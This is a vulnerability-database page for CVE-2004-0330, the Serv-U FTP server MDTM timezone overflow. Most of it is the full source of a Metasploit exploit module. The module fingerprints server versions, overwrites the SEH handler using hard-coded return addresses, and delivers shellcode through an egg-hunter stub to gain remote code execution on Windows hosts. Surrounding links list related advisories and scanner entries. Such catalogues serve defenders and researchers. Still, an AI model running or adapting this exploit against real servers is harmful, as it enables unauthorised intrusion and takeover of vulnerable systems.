Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Serv-U FTPD MDTM Overflow

🗓️ 25 Dec 2005 22:47:38Reported by spoonm <spoonm@no$email.com>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 24 Views

Serv-U FTPD MDTM command timezone overflow exploit against versions 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0, nt4/2k/xp/2k

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2004-0330
20 Sep 201000:00
circl
Check Point Advisories		Serv-U FTP Server Timezone MDTM Buffer Overflow (CVE-2004-0330)
8 Nov 200900:00
checkpoint_advisories
CVE		CVE-2004-0330
18 Mar 200405:00
cve
Cvelist		CVE-2004-0330
18 Mar 200405:00
cvelist
Exploit DB		RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)
20 Sep 201000:00
exploitdb
Tenable Nessus		Serv-U MDTM Command Overflow
26 Feb 200400:00
nessus
NVD		CVE-2004-0330
23 Nov 200405:00
nvd
Packet Storm		Serv-U FTPD MDTM Overflow
26 Nov 200900:00
packetstorm
Saint		Serv-U FTP Server MDTM timezone buffer overflow
27 Oct 200600:00
saint
Saint		Serv-U FTP Server MDTM timezone buffer overflow
27 Oct 200600:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Serv-U FTPD MDTM Overflow',
      'Description'    => %q{
          This is an exploit for the Serv-U\'s MDTM command timezone
        overflow. It has been heavily tested against versions
        4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against
        nt4/2k/xp/2k3. I have also had success against version 3,
        but only tested 1 version/os. The bug is in all versions
        prior to 5.0.0.4, but this exploit will not work against
        versions not listed above. You only get one shot, but it
        should be OS/SP independent.

        This exploit is a single hit, the service dies after the
        shellcode finishes execution.
      },
      'Author'         => [ 'spoonm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-0330'],
          [ 'OSVDB', '4073'],
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html'],
          [ 'BID', '9751'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          'StackAdjustment' => -3500,
        },
      'Platform'      => %w{ win },
      'Targets'        =>
        [
          [
            'Serv-U Uber-Leet Universal ServUDaemon.exe', # Tested OK - hdm 11/25/2005
            {
              'Platform' => 'win',
              'Ret'      => 0x00401877,
            },
          ],
          [
            'Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe',
            {
              'Platform' => 'win',
              'Ret'      => 0x0040164d,
            },
          ],
          [
            'Serv-U 5.0.0.0 ServUDaemon.exe',
            {
              'Platform' => 'win',
              'Ret'      => 0x0040167e,
            },
          ],
        ],
      'DisclosureDate' => 'Feb 26 2004',
      'DefaultTarget' => 0))

    register_advanced_options(
      [
        OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]),
        OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]),
      ])

  end

  # From 5.0.0.4 Change Log
  # "* Fixed bug in MDTM command that potentially caused the daemon to crash."
  #
  # Nice way to play it down boys
  #
  # Connected to ftp2.rhinosoft.com.
  # 220 ProFTPD 1.2.5rc1 Server (ftp2.rhinosoft.com) [62.116.5.74]
  #
  # Heh :)

  def check
    connect
    disconnect

    case banner
      when /Serv-U FTP Server v4\.1/
        vprint_status('Found version 4.1.0.3, exploitable')
        return Exploit::CheckCode::Appears

      when /Serv-U FTP Server v5\.0/
        vprint_status('Found version 5! 5.0.0.0 may be exploitable, but not 5.0.0.4');
        return Exploit::CheckCode::Detected

      when /Serv-U FTP Server v4\.0/
        vprint_status('Found version 4.0.0.4 or 4.1.0.0, additional check.');
        send_user(datastore['USER'])
        send_pass(datastore['PASS'])
        if (double_ff?())
          vprint_status('Found version 4.0.0.4, exploitable');
          return Exploit::CheckCode::Appears
        else
          vprint_status('Found version 4.1.0.0, exploitable');
          return Exploit::CheckCode::Appears
        end

      when /Serv\-U FTP Server/
        vprint_status('Found an unknown version, try it!');
        return Exploit::CheckCode::Detected

      else
        vprint_status('We could not recognize the server banner')
        return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    c = connect_login
    return if not c

    print_status("Trying target #{target.name}...")

    # Should have paid more attention to skylined's exploit, only after figuring
    # out how my payloads were getting transformed did I remember seeing \xff
    # doubling in his CHMOD exploit, arg!
    shellcode = payload.encoded

    case datastore['ForceDoubling']
      when 1
        print_status("Forced doubling of all \\xff sequences in the encoded payload")
        shellcode.gsub!(/\xff/, "\xff\xff")
      when 0
        print_status("Forced doubling has been disabled")
      when 2
        if (double_ff?())
          print_status("Forced doubling enabled after detection of version 4.0.0.4")
          shellcode.gsub!(/\xff/, "\xff\xff")
        end
    end

    # Searcher expects address to start scanning at in edi
    # Since we got here via a pop pop ret, we can just the address of the jmp
    # off the stack, add esp, BYTE -4 ; pop edi

    search_rtag = "\x34\x33\x32\x31" # +1 / 0 / -1 [start, end, stored]
    search_stub = Rex::Arch::X86.searcher(search_rtag)
    search_code = "\x83\xc4\xfc\x5f" + search_stub + 'BB'
    if (datastore['SEHOffset'] < search_code.length)
      print_error("Not enough room for search code, adjust SEHOffset")
      return
    end

    jump_back = Rex::Arch::X86.jmp_short('$+' + (-1 * search_code.length).to_s) + 'BB'

    buf = 'MDTM 20031111111111+' + ('A' * (datastore['SEHOffset'] - search_code.length))
    buf << search_code
    buf << jump_back
    buf << [target.ret].pack('V')
    buf << ' /'
    buf << Rex::Arch::X86.dword_adjust(search_rtag, 1)
    buf << shellcode
    buf << search_rtag

    send_cmd( [buf], false )

    handler
    disconnect
  end

  def double_ff?
    res = send_cmd( ['P@SW'], true )
    return (res and res =~ /^500/) ? true : false
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Jul 2017 13:26Current
0.3Low risk
Vulners AI Score0.3
CVSS 210
EPSS0.8547
serv-uftpdmdtm commandtimezone overflowexploitversionsnt4/2k/xp/2k3
24